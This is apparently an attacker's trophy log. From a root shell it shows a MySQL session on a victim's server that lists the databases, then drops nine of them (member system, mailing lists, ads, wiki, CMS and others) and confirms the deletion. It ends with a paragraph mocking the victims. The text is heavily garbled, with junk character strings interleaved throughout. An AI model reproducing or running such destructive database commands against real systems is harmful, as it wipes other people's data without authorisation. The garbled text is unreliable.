sh-3.2# mysql % c% u/ y. d8 v7 S7 Q/ }2 E- \5 bWelcome to the MySQL monitor. Commands end with ; or \g.1 \5 w3 p/ P, R9 O+ C# v
Your MySQL connection id is 407156 8 ]! R( P t2 _ D" d; iServer version: 5.0.45-community-log MySQL Community Edition (GPL)# n( M* B9 B4 p( J3 n. u
! A2 N/ V# Z9 j8 d4 z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. ! |8 ~6 ^% X! R7 V- J0 ^: Q$ e/ C$ E* f4 z( d! E6 T/ O4 ~* W) E5 K, i
mysql> show databases; ( L; ~1 c+ A7 u1 T; y5 W+———————–+, ]& R1 ]2 T! @- t/ G; m' G
| Database |: Z$ h7 I' [3 Y6 Y* }9 e. |
+———————–+) a- @% Q' B& I
| information_schema | 0 t7 h8 K8 u$ h+ I| astanet_ads | ! s. }' G$ F' H X! u* g* k; J: H: W| astanet_mailing_lists | : Y3 }+ J1 m: z! b| astanet_mediawiki | : I9 u" c4 ^! W4 ^| astanet_membersystem | 0 y4 s$ z; J$ x1 h| com_contrexx |: |+ [0 b3 T8 v) r0 a3 H+ L3 T) Q0 x
| com_contrexx2 | , L4 _2 [6 X3 @& L( M| com_contrexx2_live | " e0 \. e# T5 m% ~* h7 W2 o8 O# ^| da_roundcube |: ?9 d* ~+ k3 [& @
| dolphin | # w+ q/ d+ f: ~5 N$ {7 q( h| ideapool | & W4 s3 S) u2 U| mysql | 4 R8 L" R/ J6 x6 G| test | * N/ _6 l' B" B' C: w, V9 R| yourmaster | 7 N7 v! U" [( Y+ r9 H+———————–+ & b# A* ?: k9 ~14 rows in set (0.03 sec). |9 G; _, g0 P3 ?
8 p1 z* Y, W6 D' d* T$ W5 gmysql> drop database astanet_membersystem; # ^: O5 q: P- j# s( @droQuery OK, 46 rows affected (0.81 sec) # \ L; e# B' E, ^" [+ {) a7 \ 9 g9 Y* E3 S% `. W3 ]0 B! \mysql> drop database com_contrexx; / w- n) h* s4 M! Q" ]( h; b2 wQuery OK, 211 rows affected (2.72 sec)0 R7 W. x, A/ T+ C" {& M+ E4 O
* p% u# g( ^5 C# {6 ~ b4 emysql> drop database com_contrexx2;& I7 n7 R% Y4 u5 V( R0 u) b& Q. J
Query OK, 237 rows affected (2.23 sec)4 A# l3 ?5 ~% c. w, ]2 Z- I& ~
9 k' ]# |4 e" `6 B9 p; g* C2 E
mysql> drop database com_contrexx2_live; 6 _. r7 y/ K- U/ R( D2 [Query OK, 227 rows affected (7.63 sec) : [4 o- E, J9 Z/ E; z4 \; W2 @1 ?0 l+ Y1 T/ Z. s7 k) a- h
mysql> drop database ideapool; % d, k7 }' B8 Z6 S7 A9 }Query OK, 69 rows affected (0.19 sec) & Q" l9 z% F4 `9 Z' b/ D. g W/ ?0 d' ]0 p I8 t$ O
mysql> drop database yourmaster;, V5 H# } J, P
Query OK, 158 rows affected (0.55 sec) $ M5 Q, m' ~9 T+ ? x( N " w# q' x/ a8 D) zmysql> drop database astanet_ads;6 w. q/ k, z7 f0 G: c
Query OK, 9 rows affected (0.11 sec) ) c e. P5 T* d) W- d. W - R, L' X/ o& m7 B" Dmysql> drop database astanet_mailing_lists;7 i' _/ C$ W' y( |; r' o
Query OK, 24 rows affected (1.47 sec) 4 W: ~0 }/ I) ?8 m7 u0 }8 m" ]% V' q; h) a, g' I0 N0 P
mysql> drop database astanet_mediawiki;5 M- _* ?0 t$ z/ M% L" s+ m
Query OK, 31 rows affected (0.51 sec) _5 @* g! r. Y& V6 R9 V, j. p% n j$ f- H- @ Q' Q3 k& _
mysql> show databases;7 A! g# i' o' Z, k. z
+——————–+7 ~% x! H: g! ^1 u8 \# K# ~. `, h
| Database |0 ]7 }4 ]8 ?4 G
+——————–+ & w( P. D. X$ G| information_schema |- p) x3 k1 w/ ~/ x
| da_roundcube | 7 j6 A$ ^& m+ d! Z| dolphin | ( j# F: t+ x3 u+ U) L. c5 ?8 E| mysql |, w+ ~; }$ d6 G9 o2 i
| test | u$ \2 {5 f) K& z g" z0 {8 f+——————–+" ~+ h$ k1 p* N
5 rows in set (0.00 sec)$ k9 z$ `( M9 h* [& t
3 B- ]# }8 J) z& ~- n" G7 {, r% BWhat a journey! We’re not sure exactly why the “Terminator” had any influence on$ n7 b3 T8 k r$ h4 \
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the % `8 T. U0 Z+ F1 J3 G7 L1 j! g& Ywrong to say this pack of morons *wont be back*. ! {: O0 P( l* n2 n+ o* q8 J